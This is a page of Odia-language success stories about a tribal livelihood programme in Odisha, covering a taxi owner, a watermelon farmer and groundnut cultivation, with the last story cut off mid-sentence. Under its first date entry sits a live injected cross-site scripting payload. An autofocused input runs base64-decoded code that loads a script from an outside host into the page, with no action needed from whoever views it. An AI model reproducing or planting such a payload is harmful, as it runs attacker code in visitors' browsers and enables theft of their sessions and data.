12 Dec, 2012
">

"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL2gyMXlzYzZ6bGQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>

20 Mar, 2024
ଡ୍ରାଇଭିଂ ସ୍ୱପ୍ନ: ସ୍ୱଳ୍ପ ସମୟ (ପାର୍ଟ ଟାଇମ୍ )ଟ୍ୟାକ୍ସି ଡ୍ରାଇଭରରୁ ଏକ ସଫଳ ଯୁବ-ଉଦ୍ୟୋଗୀ ଭାବେ ନିଜକୁ ପ୍ରତିଷ୍ଠିତ କରିବା ପର୍ଯ୍ୟନ୍ତ କବୀରାଜଙ୍କ ଯାତ୍ରାର କାହାଣୀ

କବିରାଜ କହଁର (ବୟସ-୨୮) ତାଙ୍କ ପାଞ୍ଚଜଣିଆ ସଦସ୍ୟ ଥିବା ପରିବାର ଯଥା ତାଙ୍କ ପତ୍ନୀ, ପୁଅ, ମା ଏବଂ ଭଉଣୀଙ୍କ ସହିତ କନ୍ଧମାଳ ଜିଲ୍ଲାର ଫିରିଙ୍ଗିଆ ବ୍ଲକ  ଅନର୍ଗତ ପୋବିଙ୍ଗିଆ ଗ୍ରାମପଞ୍ଚାୟତ ର  ସାଇତିଙ୍ଗିଆ ଗ୍ରାମରେ ବାସ କରନ୍ତି  । କବିରାଜ ଫିରିଙ୍ଗିଆ କଲେଜରୁ ଡିଗ୍ରୀ ହାସଲ କରିବାସହ ଇଣ୍ଡଷ୍ଟ୍ରିଆଲ୍ ଟ୍ରେନିଂ ଇନଷ୍ଟିଚ୍ୟୁଟ୍ (ଆଇ.ଟି.ଆଇ) ରୁ ବୈଦ୍ୟୁତିକ କାର୍ଯ୍ୟରେ ଡିପ୍ଲୋମା ମଧ୍ୟ କରିଛନ୍ତି । କବିରାଜ ନିଜର ଜୀବିକା ନିର୍ବାହ ନିମନ୍ତେ ନିଜର ସ୍ୱଳ୍ପ ପୈତୃକ ସମ୍ପତିରେ କୃଷି କାର୍ଯ୍ୟ ପରିଚାଳନା କରିବା ସହିତ ଦିନ ମଜୁରି କାମରେ ନିୟୋଜିତ ହୁଅନ୍ତି ଏବଂ ବେଳେବେଳେ ନିଜର ସମ୍ପର୍କୀୟ ଭିଣୋଇଙ୍କର ଥିବା ଟ୍ୟାକ୍ସିର ଡ୍ରାଇଭର ଭାବେ କାମ କରି ଭଡା ପ୍ରତି ୭୦୦.୦୦ ଟଙ୍କା   ରୋଜଗାର କରି ପାରନ୍ତି । ବ୍ୟକ୍ତିଗତ କାର  ହୋଇଥିବାରୁ ଅଧିକ ସମୟ ବ୍ୟକ୍ତିଗତ କାମରେ ଲାଗେ ଏବଂ ଖୁବ୍ କମ୍ ସମୟ ପାଇଁ ଭଡାରେ ଲାଗିଥାଏ । ତେଣୁ  କବିରାଜ ମାସିକ ସର୍ବାଧିକ ୨ ରୁ ୩ ଟି ଭଡା ପାଇଥାନ୍ତି ଯେଉଁଥିରୁ ସେ ହାରାହାରି ୨,୫୦୦.୦୦ ଟଙ୍କା ପର୍ଯ୍ୟନ୍ତ ରୋଜଗାର କରିପାରିଥାଆନ୍ତି । ନିଜ ପରିବାରର ଆର୍ଥିକ ସ୍ଥିତିକୁ ସୁଧାରିବା ପାଇଁ ଏକ ଛୋଟ ଟ୍ୟାକ୍ସି କିଣିବାକୁ ଇଚ୍ଛା ଥିଲେ ମଧ୍ୟ ନିଜର ଆର୍ଥିକ ଦୁରାବସ୍ଥା ଥିବାରୁ ଏବଂ ନିଜର ସ୍ୱପ୍ନକୁ ସାକାର କରିବା ପାଇଁ ପରିବାର ଅଥବା ସମ୍ପର୍କୀୟଙ୍କ ସହଯୋଗର ଅଭାବରୁ କବିରାଜ ନିଜର ସ୍ବପ୍ନକୁ ସାକାର କରିବାରେ କୃତକାର୍ଯ୍ୟ ହୋଇପାରୁନଥିଲେ । କବିରାଜଙ୍କ ଆଗ୍ରହକୁ ସ୍ୱୀକାର କରି ଏମ୍.ଏମ୍.ଜେ.ଜେ.ଏମ୍. ଅଧୀନରେ ପ୍ରତିଷ୍ଠିତ ରୂପସିଂହାର ଜେ.ଜେ.ପି. ର ସଭାପତି ତଥା ସଚିବ ତାଙ୍କୁ ଏମ୍.ଏମ୍.ଜେ.ଜେ.ଏମ୍. ଅନ୍ତର୍ଗତ ଜନଜାତି ଯୁବ-ଉଦ୍ୟୋଗୀ ପ୍ରୋତ୍ସାହନ କାର୍ଯ୍ୟକ୍ରମ ତରଫରୁ ସହାୟତା ପାଇଁ ଉପଯୁକ୍ତ ପ୍ରାର୍ଥୀ ଭାବରେ ପ୍ରକଳ୍ପ ପ୍ରଶାସକ, ଆଇ.ଟି.ଡି.ଏ, ଫୁଲବାଣୀଙ୍କୁ ସୁପାରିଶ କରିଥିଲେ । ଟ୍ୟାକ୍ସି ଚାଳନାରେ ତାଙ୍କର ପୂର୍ବ ଅଭିଜ୍ଞତା ଥିବାରୁ ଏବଂ ତାଙ୍କ ନିକଟରେ ଶିକ୍ଷାର୍ଥୀ ଭାବେ ଲାଇସେନ୍ସ ଥିବାରୁ କବିରାଜଙ୍କୁ ତାଙ୍କର ବର୍ତ୍ତମାନର ସ୍ୱଳ୍ପ ସମୟ (ପାର୍ଟ ଟାଇମ୍) ଡ୍ରାଇଭର କମ ଛାଡି ନିଜର ବ୍ୟକ୍ତିଗତ ଟ୍ୟାକ୍ସି ହାସଲ କରିବାକୁ ଉତ୍ସାହିତ କରାଯାଇଥିଲା । ତାଙ୍କର ପ୍ରାରମ୍ଭିକ ଦ୍ୱିଧା ଥିଲେ ମଧ୍ୟ ଆଇ.ଟି.ଡି.ଏ କର୍ମଚାରୀଙ୍କ ସହ ଅନେକ ଥର ବୈଠକ କରି ସେମାଙ୍କନ ଠାରୁ ପ୍ରେରଣା ପାଇବା ପରେ ଏବଂ ପରେ ପରେ ଯୁବ-ଉଦ୍ୟୋଗୀ ପ୍ରୋତ୍ସାହନ ସମ୍ପର୍କିତ ପ୍ରଶିକ୍ଷଣରେ ଭାଗନେବା ପରେ , କାବିରାଜ ତାଙ୍କର ଲକ୍ଷ୍ୟ ହାସଲ କରିବା ପାଇଁ ଏମ୍.ଏମ୍.ଜେ.ଜେ.ଏମ୍. ରୁ ମିଳିବାକୁଥିବା ୧,୦୦୦,୦୦.୦୦ ଟଙ୍କାର ଆର୍ଥିକ ସହାୟତାକୁ  ବ୍ୟବହାର କରି ନିଜର ଏକ ନୂତନ ଟ୍ୟାକ୍ସି କିଣିବା ପାଇଁ ଆତ୍ମବିଶ୍ୱାସ ବଢାଇଥିଲେ  ।  ଏଥିସହ, ଆଇ.ଟି.ଡି.ଏ, ଅଧିକାରୀମାନେ ତାଙ୍କ ଲଘୁ-ଉଦ୍ଯୋଗ ପ୍ରତିଷ୍ଠା ନିମନ୍ତେ ଏକ ବିସ୍ତୃତ ବ୍ୟବସାୟ-ବିକାଶ ଯୋଜନା ପ୍ରସ୍ତୁତ କରିବାରେ ତାଙ୍କୁ ସହାୟତା ପ୍ରଦାନ କରିଥିଲେ ।   ଆଇ.ଟି.ଡି.ଏ, ଫୁଲବାଣୀ ଦ୍ୱାରା ସହୟତା ଭାବେ ମିଳିଥିବା ୧,୦୦୦,୦୦.୦୦  ଟଙ୍କା ଏବଂ ତାଙ୍କର ବ୍ୟକ୍ତିଗତ ଅବଦାନ ୮୦,୦୦୦.୦୦ ଟଙ୍କାକୁ ମିଶାଇ କାବିରାଜ ଏକ ଘରୋଇ ଟ୍ୟାକ୍ସି (ୱାଗନଆର କାର) କିଣିବା ନିମନ୍ତେ ଅଗ୍ରୀମ ଦେୟ (ଡାଉନ ପେମେଣ୍ଟ) ପାଇଁ ମୋଟ୍ ୧,୮୦,୦୦୦.୦୦ ଟଙ୍କା ସଂଗ୍ରହ କରିଥିଲେ ।  ଅବଶିଷ୍ଟ ୭,୫୦,୦୦୦.୦୦ ଟଙ୍କା ସେ ଋଣରେ ନେଇଥିଲେ ଯାହା ୫ ବର୍ଷ ମଧ୍ୟରେ ୧୩,୫୦୦.୦୦ ଟଙ୍କା ମାସିକ କିସ୍ତି ମାଧ୍ୟମରେ ପରିଶୋଧ କରିବା ନିମନ୍ତେ ସ୍ଥିର କରିଥିଲେ । ୨୦୨୪ ମସିହା ମାର୍ଚ୍ଚ ମାସ ୧୬ ତାରିଖ ରେ, ପ୍ରକଳ୍ପ ପ୍ରଶାସକ, ଆଇ.ଟି.ଡି.ଏ, ଫୁଲବାଣୀଙ୍କ ଏବଂ ଅନ୍ୟ ଅଧିକାରୀମାନଙ୍କ ଉପସ୍ଥିତିରେ ଆଇ.ଟି.ଡି.ଏ, ଫୁଲବାଣୀ କାର୍ଯ୍ୟାଳୟ ପରିସରରେ କବିରାଜ ନିଜ ଟ୍ୟାକ୍ସିର ଉଦ୍ଘାଟନ କରିଥିଲେ । ୨୦ ଦିନ ଭିତରେ ୧୦ଟି ଭଡା ଯୋଗାଡ଼ କରି  କବିରାଜ ମୋଟ୍ ୩୫,୦୦୦.୦୦ ଟଙ୍କା ରୋଜଗାର କରିବାରେ ସଫଳ ହୋଇଥିଲେ ।  ସେ ଏପ୍ରିଲ୍ ମାସ (ପ୍ରଥମ ମାସ)ର କିସ୍ତି ପାଇଁ ୧୩,୫୦୦.୦୦ ଟଙ୍କା ଅଲଗାରେ ରଖିବା ପରେ ନିଜ କାର୍ ରେ ମ୍ୟାଟ୍ ପକାଇବା ଏବଂ ଅନ୍ୟାନ୍ୟ ଛାତ କାମ ନିକରାଇବା ମନ୍ତେ ୧୦, ୦୦୦ ଟଙ୍କା ଖର୍ଚ କରିବାକୁ ଯୋଜନା ରଖିଛନ୍ତି ।  ଏହା ସତ୍ବେ ମଧ୍ୟ ସେ ତାଙ୍କ ରୋଜଗାରର ବଳକା ୧୧,୫୦୦.୦୦ ଟଙ୍କା ପରିବାରର ଖର୍ଚ ନିମନ୍ତେ ବଞ୍ଚାଇ ପାରିଛନ୍ତି  ।  ତାଙ୍କ ପରିବାରର ଜୀବିକା ନିର୍ବାହରେ ଉନ୍ନତି ଆଣିବା ତଥା ନିଜର ପୂର୍ବ ଜୀବିକା ଉପାର୍ଜନର ସୀମାକୁ ଅତିକ୍ରମ କରି ଏହି ଟ୍ୟାକ୍ସି  ବ୍ୟବସାୟର ଭବିଷ୍ୟତ ସମ୍ଭାବନାକୁ ନେଇ କବିରାଜ ଅଧିକା ଆଶାବାଦୀ ଅଛନ୍ତି  ।  ଭବିଷ୍ୟତରେ ସେ ଏକ ବୋଲେରୋ  କିମ୍ବା ଏର୍ଟିଗା କାର କିଣିବାକୁ ଯୋଜନା କରିଛନ୍ତି  । "ଦିନେ ଏକ କାର କିଣିବା ମୋ ପାଇଁ ସ୍ବପ୍ନ ଥିଲା କିନ୍ତୁ, ଏମ୍.ଏମ୍.ଜେ.ଜେ.ଏମ୍. ଯୋଜନା ଅଧୀନରେ ମିଳିଥିବା ପ୍ରେରଣା, ପ୍ରଶିକ୍ଷଣ ଏବଂ ଆଇ.ଟି.ଡି.ଏ, ଫୁଲବାଣୀଙ୍କ ଠାରୁ ମିଳିଥିବା ୧,୦୦୦,୦୦.୦୦ ଟଙ୍କାର ସହାୟତା ମୋ ପାଇଁ ଏକ କାରର ମାଲିକ ହେବା ସମ୍ଭବ କରିପାରିଲା - କବିରାଜ" ।   କବିରାଜଙ୍କ କାହାଣୀ ସ୍ଥିରଚିତ ଭାବେ ନିୟୋଜିତ ହୋଇ ନିଜ ସ୍ୱପ୍ନକୁ ସାକାର କରିବାର ଏକ ଜ୍ଵଳନ୍ତ ଉଦାହରଣ  ।  ତାଙ୍କର ଏହି ସଫଳତା କେବଳ ଅନ୍ୟମାନଙ୍କୁ ସେମାନଙ୍କର ଲଘୁ-ଉଦ୍ୟୋଗୀ ହେବାର ସ୍ୱପ୍ନକୁ ସାକାର କରିବା ପାଇଁ ଆର୍ଥିକ ଅସୁବିଧାର ସମ୍ମୁଖୀନ ହେବାକୁ ପ୍ରେରଣା ଦିଏ ନାହିଁ ବରଂ ଜନଜାତି ଯୁବକମାନଙ୍କୁ ସଶକ୍ତ କରିବାରେ ଏବଂ ସ୍ଥାନୀୟ ସମ୍ପ୍ରଦାୟରେ ଅର୍ଥନୈତିକ ଅଭିବୃଦ୍ଧିରେ ଏମ୍. ଏମ୍.ଜେ.ଜେ.ଏମ୍. ର ପ୍ରମୁଖ ଭୂମିକାକୁ ମଧ୍ୟ ଆଲୋକପାତ  କରିଥାଏ ।  

27 Apr, 2024
ସହାୟକତା ଠାରୁ ନିରନ୍ତରତା ପର୍ଯ୍ୟନ୍ତ: ଓଡ଼ିଶାର କୁଚିଣ୍ଡାରେ ତରଭୁଜ ଚାଷକୁ ସଶକ୍ତକରି ଆଦିବାସୀ ଜୀବିକା ନିର୍ବାହକୁ ସୁଦୃଢୀକରଣ

ପଦ୍ମିନୀ ପିଙ୍ଗ୍ କୁଚିଣ୍ଡା ବ୍ଲକ ଅନ୍ତର୍ଗତ ଚନ୍ଦନୀମାଲ ଗ୍ରାମ ପଞ୍ଚାୟତ ଅଧୀନରେ ଥିବା "ଲାସା" ଗାଁରେ ବାସ କରନ୍ତି ।   ସେ  ବୁଦ୍ଧରାଜ ଜନଜାତି ଜୀବିକା ପରିଷଦ (ଜେଜେପି) ର ଜଣେ ସକ୍ରିୟ ସଦସ୍ୟ ଅଟନ୍ତି ।  ସେ ଜଣେ ନାମ-ମାତ୍ର ଚାଷୀ ଅଟନ୍ତି ଏବଂ  ତାଙ୍କର ମୋଟ୍ ୦.୬୦ ଏକର ଜମି ଅଛି, ଯେଉଁଥିରୁ ୦.୨୫ ଏକର ଜମିର ସ୍ୱୀକୃତି ଓ ସିରୋନାମା ଜଙ୍ଗଲ ଅଧିକାର ଅଧିନିୟମ,୨୦୦୬  ଅଧୀନରେ ମିଳିଆଛି । ଜୀବିକା ନିର୍ବାହ ପାଇଁ ପଦ୍ମିନୀ ତାଙ୍କର ସ୍ୱଳ୍ପ ଜମିରେ କୃଷି କାର୍ଯ୍ୟ କରିବା ସହ  ଅଣ କାଷ୍ଠ ଜଙ୍ଗଲଜାତ ଦ୍ରବ୍ୟ ସଂଗ୍ରହ (NTFP) ସଂଗ୍ରହ ଉପରେ ନିର୍ଭର କରନ୍ତି ଯେଉଁଥିରୁ ସେ ସର୍ବମୋଟ୍ ମାତ୍ର ୫,୦୦୦.୦୦ ଟଙ୍କା ପର୍ଯ୍ୟନ୍ତ  ରୋଜଗାର କରି ପାରନ୍ତି । ତେଣୁ, ପଦ୍ମିନୀ ତରଭୁଜ ପରି ଲାଭଜନକ ଫସଲ ଚାଷ କରିବା ପରି ଅତିରିକ୍ତ ଆୟର ଉତ୍ସ ଖୋଜୁଥିଲେ ।  କିନ୍ତୁ, ଆବଶ୍ୟକୀୟ ସମ୍ବଳ ନ ଥିବାରୁ ପଦ୍ମିନୀ ଭଲ ମଞ୍ଜି ଏବଂ ଅନ୍ୟାନ୍ୟ କୃଷି ନିବେଶ  ପାଇବା ନିମନ୍ତେ ସଂଘର୍ଷ କରୁଥିଲେ । ତାଙ୍କର ଜମି ନିକଟରେ ଏକ ନଦୀରେ ବର୍ଷ ତମାମ ଜଳ ପ୍ରବାହିତ ହେଉଥିଲେ ମଧ୍ୟ ଉଠା ଜଳସେଚନ ବ୍ୟବସ୍ଥାର ଅନୁପସ୍ଥିତି ଓ ପାଣିପମ୍ପର ଅଭାବ ଯୋଗୁ ସେ ଉଚ୍ଚ ମୂଲ୍ୟର ଲାଭଜନକ ଫସଲ ଚାଷ କରିବାରୁ  ବଞ୍ଚିତ ହେଉଥିଲେ । ଏହିଭଳି ପରିସ୍ଥିତିରେ ଏମ୍.ଏମ୍.ଜେ.ଜେ.ଏମ୍. ଯୋଜନା ପଦ୍ମିନୀ ତଥା ବୁଦ୍ଧରାଜ ଜନଜାତି ଜୀବିକା ପରିଷଦ (ଜେଜେପି)ର ଅନ୍ୟ ଚାଷୀ ମାନଙ୍କୁ ସହାୟତା ଯୋଗାଇବାକୁ ପାଦ ବଢାଇଥିଲା ।  ଜନଜାତି ସମ୍ପ୍ରଦାଯର କୃଷକ ମାନଙ୍କୁ ଭଲ ମଞ୍ଜି, ଅନ୍ୟାନ୍ୟ କୃଷି ନିବେଶ  ଏବଂ ଜଳସେଚନର ସୁବିଧା ନିମନ୍ତେ ସହାୟତା କରିବା ପାଇଁ ପ୍ରସ୍ତୁତ ହୋଇଥିବା ଏମ୍.ଏମ୍.ଜେ.ଜେ.ଏମ୍. ଯୋଜନା ତରଫରୁ ପଦ୍ମିନୀ ସଦସ୍ୟ ଥିବା ବୁଦ୍ଧରାଜ ଜେଜେପି କୁ ତରଭୁଜ, ସୋରିଷ ଏବଂ ଚୀନା ବାଦାମ ଚାଷ ନିମନ୍ତେ ସହାୟତା ପ୍ରଦାନ କରାଯାଇଥିଲା ।  ଏହି ଜେଜେପିର ସମସ୍ତ ୭୮ ଜଣ ସଦସ୍ୟ ୦.୫୦ ଏକର ଜମିରେ ତରଭୁଜ ଚାଷ ପାଇଁ ସହାୟତା ପାଇଥିଲେ । ସେମାନଙ୍କୁ ଜଣକା ୧୨୫ ଗ୍ରାମ ଓଜନର ଅଗସ୍ତା ଏବଂ ଆଇସବକ୍ସ ପରି ଉଚ୍ଚମାନର ହାଇବ୍ରିଡ୍ ତରଭୁଜ ମଞ୍ଜି ଯୋଗାଇ ଦିଆଯାଉଥିଲା । ଏଥିସହ ଫସଲର ଅଭିବୃଦ୍ଧି ପାଇଁ ୫୦ କିଲୋଗ୍ରାମ ଲିମ୍ବ ପିଡିଆ ୧ ଲିଟର ଲିଟର ଲିମ୍ବ ତେଲ, ଫସଲର ସୁରକ୍ଷା ଭଲ ଅମଳ ନିମନ୍ତେ ୬୨.୫୦ ଗ୍ରାମ ଟ୍ରାଇକୋଡର୍ମା ଏବଂ ୦.୫ ଏକର ପାଇଁ ୨୫୦ ମି.ଲି ମାଇକ୍ରୋନ୍ୟୁଟ୍ରିଏଣ୍ଟ ଭଳି ଜୈବିକ ସାର, କୀଟନାଶକ ଓ ଅନ୍ୟାନ୍ୟ କୃଷି ନିବେଶ ଯୋଗାଇ ଦିଆଯାଇଥିଲା  । ପଦ୍ମିନୀଙ୍କର ତରଭୁଜ ଚାଷ ପାଇଁ ମୋଟ ଉତ୍ପାଦନ ମୂଲ୍ୟ ୦.୫ ଏକର ନିମନ୍ତେ ୨୦,୫୪୦ ଟଙ୍କା ଥିଲା ଏବଂ ଏଥିମଧ୍ୟରୁ ୫,୫୧୭.୦୦ ଟଙ୍କା ଏମ୍.ଏମ୍.ଜେ.ଜେ.ଏମ୍. କାର୍ଯ୍ୟକ୍ରମ ମାଧ୍ୟମରେ ସହାୟତା ପ୍ରାପ୍ତ ହୋଇଥିବାବେଳେ ବାକି ୧୫,୦୨୩.୦୦ ଟଙ୍କା ପଦ୍ମିନୀ ନିଜେ ବିନିଯୋଗ କରିଥିଲେ  ।   ଜମି ପ୍ରସ୍ତୁତି, ଚାଷ ସାମଗ୍ରୀ କ୍ରୟ, ମୂଲ ମଜୁରି, ଏବଂ ଅଧିକ କିଛି ସାର ପ୍ରୟୋଗ ଏବଂ ଅତ୍ୟାବଶ୍ୟକ ଉଦ୍ଭିଦ ସୁରକ୍ଷା ସଙ୍କେତ (ପିପିସି) ଇତ୍ୟାଦି ନିମନ୍ତେ ସେ ଏହି ନିଜସ୍ଵ ବିନିଯୋଗ କରିଥିଲେ । ତିନିରୁ ଚାରି ମାସ ମଧ୍ୟରେ ସେ ମୋଟ ୭୫,୯୭୭.୦୦ ଟଙ୍କା ଲାଭ କରିଥିଲେ ଯାହା ତାଙ୍କ ଘରର ଆବଶ୍ୟକତା ପୂରଣ କରିବାକୁ ସହାୟକ ହୋଇଥିଲା । ଏହି ସଫଳତା ​ତାଙ୍କୁ ଜଣେ ସହାୟକ ଚାଷରୁ ସ୍ଥାୟୀ ତଥା ବିବିଧ କୃଷି ଅଭ୍ୟାସକୁ ଅପଣେଇନେବା ନିମନ୍ତେ ପ୍ରେରିତ କରିବା ସହ ସେ ତାଙ୍କ ଆୟକୁ ଆହୁରି ବୃଦ୍ଧି କରିବାକୁ ଲକ୍ଷ୍ୟ ମଧ୍ୟ କରିଥିଲେ । ଏହି ଯୋଜନାକୁ ସଫଳ ଭାବେ କାର୍ଯ୍ୟକାରୀ କରିବା ତଥା ଅତ୍ୟାବଶ୍ୟକ ସମସ୍ତ ସହାୟତା ପ୍ରଦାନ କରିବା ନିମନ୍ତେ ଆଇ.ଟି.ଡି.ଏ କୁଚିଣ୍ଡା ମୁଖ୍ୟ ଭୂମିକା ଗ୍ରହଣ କରିଥିଲା ।  କୃଷକ ମାନଙ୍କର ପ୍ରଶିକ୍ଷଣ ଓ ଦକ୍ଷତା ବିକାଶ ନିମନ୍ତେ ଉଦ୍ୟାନ କୃଷି ବିଭାଗ, କୁଚିଣ୍ଡା ଏବଂ ଓଡିଶା ଜୀବିକା ମିଶନ (ଓ.ଏଲ.ଏମ୍) ର ଅଧିକାରୀମାନଙ୍କ ସହ ମଧ୍ୟ ସହଯୋଗ ସ୍ଥାପନ କରାଯାଇଥିଲା । ଏହା ସହିତ, ସି.ଇ.ଓ, ଓରମାସ, ସମ୍ବଲପୁର, ଉତ୍ପାଦର ବଜାରିକରଣ ସମୟରେ ସହାୟତା ପ୍ରଦାନ କରିଥିଲେ । “ଉନ୍ନତ ମନର ତରଭୁଜ ଚାଷ ନିମନ୍ତେ ମୋତେ ସହାୟତା ପ୍ରଦାନ କରିଥିବାରୁ ମୁଁ ଏମ୍.ଏମ୍.ଜେ.ଜେ.ଏମ୍. କୁ ମୋର ହୃଦୟରୁ କୃତଜ୍ଞତା ଜଣାଇବାକୁ ଚାହୁଁଛି । ସେମାନଙ୍କ ସାହାଯ୍ୟ ଯୋଗୁଁ ମୁଁ ଚଳିତ ବର୍ଷ ଭଲ ଲାଭ ପାଇ ପାରିଛି ।  ସରକାରଙ୍କ ଏହି ପଦକ୍ଷେପକୁ ମୁଁ ଅନେକ ଅନେକ ପ୍ରଶଂସା କରୁଛି - ପଦ୍ମିନୀ । କୁଚିନ୍ଦାରେ ଚାଲୁଥିବା ଏମ୍.ଏମ୍.ଜେ.ଜେ.ଏମ୍. କାର୍ଯ୍ୟକ୍ରମ, ତରଭୁଜ ଚାଷ ମାଧ୍ୟମରେ ଜନଜାତି ସମ୍ପ୍ରଦାୟ ଦ୍ୱାରା  ସ୍ୱଳ୍ପ ଜୀବିକା ନିର୍ବାହ ନିମନ୍ତେ ଅଭ୍ୟାସ କରାଯାଉଥିବା ଚାଷ ପ୍ରଣାଳୀ କୁ ସ୍ଥାୟୀ ଚାଷ ପ୍ରଣାଳୀରେ ପରିବର୍ତ୍ତନ କରିବାକୁ ପ୍ରୟାସ କରି ଏଥିରେ ସକ୍ଷମ ହୋଇଥିଲା  ।  ଏହି ସୁଚିନ୍ତିତ ପଦକ୍ଷେପ କେବଳ ପାରିବାରିକ ଆୟକୁ ବଢାଇନଥିଲା ବରଂ ଏହା ଜନଜାତି ସମ୍ପ୍ରଦାୟ ମଧ୍ୟରେ ଅର୍ଥନୈତିକ ସ୍ଥିରତା ବଢାଇବାରେ ମଧ୍ୟ ସହାୟକ ହୋଇପାରିଲା  ।

26 Apr, 2024
ଚୀନା ବାଦାମ ଚାଷ ମାଧ୍ୟମରେ ଜନଜାତି ସମ୍ପ୍ରଦାୟର ସଶକ୍ତି କରଣ: କୋରାପୁଟ ଜିଲ୍ଲା ଅନ୍ତର୍ଗତ କୁଟୁଗାଁ ଗ୍ରାମର ଏକ କାହାଣୀ

ଜିଲ୍ଲା ମୁଖ୍ୟାଳୟଠାରୁ ୪୦ କିଲୋମିଟର ଦୂରରେ ଅବସ୍ଥିତ କୁଟୁଗାଁ ଗ୍ରାମ, କୋରାପୁଟ ଜିଲ୍ଲା ଅନ୍ତର୍ଗତ ସେମିଲିଗୁଡା ବ୍ଲକର ଡାଲାଇଗଡା ଗ୍ରାମ ପଞ୍ଚାୟତରେ ଅବସ୍ଥିତ   ।  ଏହି ଗ୍ରାମରେ ମୁଖ୍ୟତଃ ପରାଜା ସମ୍ପ୍ରଦାୟର ଜନଜାତି ମାନେ ବସବାସ କରନ୍ତି ଏବଂ ନିଜର ଜୀବିକା ନିର୍ବାହ ପାଇଁ ସେମାନେ ମୁଖ୍ୟତଃ କୃଷି ଏବଂ ପଶୁପାଳନ ଉପରେ ନିର୍ଭର କରିଥାନ୍ତି  ।  ନିକଟସ୍ଥ କୋଲାବ ନଦୀରୁ ଉତ୍ପନ୍ନ ଏକ ଛୋଟ ଝରଣାର ଉପସ୍ଥିତି ସତ୍ୱେ  ମଧ୍ୟ ଏହି ଗାଁରେ ଜଳସେଚନ ପାଇଁ ପର୍ଯ୍ୟାପ୍ତ ଭିତ୍ତିଭୂମିର ଅଭାବ ଥିଲା । ଅବଶ୍ୟ, ୨୦୨୨ ମସିହାରେ ମିଶନ୍ ଜୀବିକା ଯୋଜନାର ହସ୍ତକ୍ଷେପ ଦ୍ୱାରା ହିତାଧିକାରୀମାନଙ୍କୁ ସ୍ପ୍ରିଙ୍କଲର ଜଳସେଚନ ବ୍ୟବସ୍ଥା ଯୋଗାଇ ଦିଆଯାଉଥିଲା ଯାହା  ଦ୍ୱାରା  ସେମାନେ ସେମାନଙ୍କର କୃଷି ଜମିକୁ ଚାଷ କରିବାରେ ସକ୍ଷମ ହୋଇଥିଲେ । 2023 ମସିହାରେ ମିଶନ୍ ଜୀବିକା ବନ୍ଦ ହେବା ପରେ ହିତାଧିକାରୀମାନେ ମୁଖ୍ୟମନ୍ତ୍ରୀ ଜନଜାତି ଜୀବିକା ମିଶନ୍ (ଏମ୍.ଏମ୍.ଜେ.ଜେ.ଏମ୍) ଯୋଜନାରେ ସାମିଲ ହୋଇ ୧୦୯ ଜଣ ସଦସ୍ୟ ବିଶିଷ୍ଠ ଏକ କୃଷି-ଉଦ୍ୟାନ କୃଷି ଜୀବିକା କ୍ଲଷ୍ଟର ଗଠନ କରିଥିଲେ  ।   ଏହି ଗ୍ରାମର କିଛି ଚାଷୀ ପୂର୍ବରୁ ନିଜର ବ୍ୟକ୍ତିଗତ ବ୍ୟବହାର ପାଇଁ ଅଳ୍ପ ଆକାରରେ ଚୀନା ବାଦାମ ଚାଷ କରନ୍ତି ।  ଚୀନା ବାଦାମ ଚାଷର ଲୋକପ୍ରିୟତାର ଅଭାବ ସତ୍ୱେ ଜଳସେଚନର ଅଭାବକୁ ବିଚାରକୁ ନେଇ ସମନ୍ଵୟ ଆଦିବାସୀ ବିକାଶ ସଂସ୍ଥା (ଆଇ.ଟି.ଡି.ଏ) କୋରାପୁଟଙ୍କ ଦ୍ଦ୍ୱାରା ଉତ୍ସାହିତ ହୋଇ ସଦସ୍ୟମାନେଏକତ୍ରିତ ହୋଇଥିଲେ ଏବଂ ରବି ଋତୁରେ ଏକ ଶୁଖିଲା ଜମି ଫସଲ ବିକଳ୍ପ ଭାବରେ ଚୀନା ବାଦାମ ଚାଷ କରିବା ପାଇଁ  ନିଷ୍ପତି ନେଇଥିଲେ  । ଏମ୍.ଏମ୍.ଜେ.ଜେ.ଏମ୍ କାର୍ଯ୍ୟକ୍ରମରେ ଭାଗନେଇ, ଚାଷୀ ମାନେ ଉଚ୍ଚମାନର ଚୀନା ବାଦାମ ମଞ୍ଜି, ଜୈବିକ ସାର ଏବଂ କୀଟନାଶକ ତଥା ପ୍ରତ୍ୟେକ ହିତାଧିକାରୀ ୩୫ କିଲୋଗ୍ରାମ ଚୀନା ବାଦାମ ମଞ୍ଜି, ୨୫ କିଲୋଗ୍ରାମ ଜୈବିକା ଖତ (ଲିମ୍ବ ପିଡିଆ), ୦.୫ ଲିଟର ଲିମ୍ବ ତେଲ, ୦.୨୫ ଲିଟର ମାଇକ୍ରୋନ୍ୟୁଟ୍ରିଏଣ୍ଟସ୍ ଏବଂ ବିହନ ବିଶୋଧନ ନିମନ୍ତେ ୦.୨୫ ଗ୍ରାମ ଜୈବିକ କୀଟନାଶକ ପାଇପାରିଛନ୍ତି । ଏହା ସହିତ, ଆଇ.ଟି.ଡି.ଏ ର ଅଧିକାରୀ ମାନେ ତଥା ଗୋଷ୍ଠୀ ସ୍ତରରେ ଚାଷୀ ମାନଙ୍କ ସହ କମ କରୁଥିବା ଏନଜିଓ (FNGO) “ସେଣ୍ଟର ଫର ୟୁଥ୍ ଆଣ୍ଡ ସୋସିଆଲ୍ ଡେଭଲପମେଣ୍ଟ୍ (CYSD)”, ତରଫରୁ ଲାଇନ ବିହନ ବୁଣା ପଦ୍ଧତି ଏବଂ ଏହାର ଲାଭ, ସଠିକ୍ ଭାବେ ଖତସାର ଏବଂ କୀଟନାଶକ ପ୍ରୟୋଗ  ଇତ୍ୟାଦି ଚୀନା ବାଦାମ କୃଷି ପରିଚାଳନା ସମ୍ପର୍କରେ ଶିକ୍ଷା ଦେବା ନିମନ୍ତେ ଅନେକ କ୍ଲଷ୍ଟର ସ୍ତରୀୟ ପ୍ରଶିକ୍ଷଣ କାର୍ଯ୍ୟକ୍ରମ ଆୟୋଜନ କରାଯାଇଥିଲା ।    ଏକର ପିଛା ହାରାହାରି ୧୮ ରୁ ୨୦ କ୍ୱିଣ୍ଟାଲ ଅମଳ କରି ଅମଳ ସମୟରେ କ୍ୱିଣ୍ଟାଲ ପ୍ରତି ୧୨୦୦.୦୦ ଟଙ୍କାରୁ ୧୪୦୦.୦୦ ଟଙ୍କା ବିକ୍ରୟ କରି 